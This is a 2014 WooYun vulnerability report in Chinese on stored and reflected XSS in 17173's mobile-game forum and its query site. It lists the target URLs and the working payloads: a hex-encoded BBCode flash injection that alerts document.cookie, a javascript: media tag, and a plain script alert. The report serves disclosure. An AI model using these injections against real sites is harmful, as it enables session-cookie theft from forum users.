漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-082453
漏洞标题:17173旗下手游网及其分站xss漏洞
相关厂商:17173游戏
漏洞作者: 路人甲
提交时间:2014-11-10 14:51
修复时间:2014-11-15 14:52
公开时间:2014-11-15 14:52
漏洞类型:xss
危害等级:中
自评Rank:8
漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-11-10: 细节已通知厂商并且等待厂商处理中
2014-11-15: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
17173旗下手游网及其分站xss漏洞
详细说明:
储存性XSS漏洞
URL:http://bbs.shouyou.com/forum.php?mod=viewthread&tid=153301&page=1&extra=#pid9009501
代码1:[flash=222,111]http://aa\x22\x3e\x3c\x69\x6d\x67\x20\x73\x72\x63\x3d\x31\x20\x6f\x6e\x65\x72\x72\x6f\x72\x3d\x61\x6c\x65\x72\x74\x28\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x63\x6f\x6f\x6b\x69\x65\x29\x3e//.swf[/flash]
代码2:[media=x,500,375]javascript://wwidu.com/%0Aalert(document.cookie)[/media]
反射性xss漏洞
url:http://cha.17173.com/
代码:<script>alert(0)</script>
漏洞证明:
修复方案:
小菜一枚、、恳求邀请码。让乌云大神带我一起飞。。飞!!
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2014-11-15 14:52
厂商回复:
最新状态:
2014-11-17:修复中。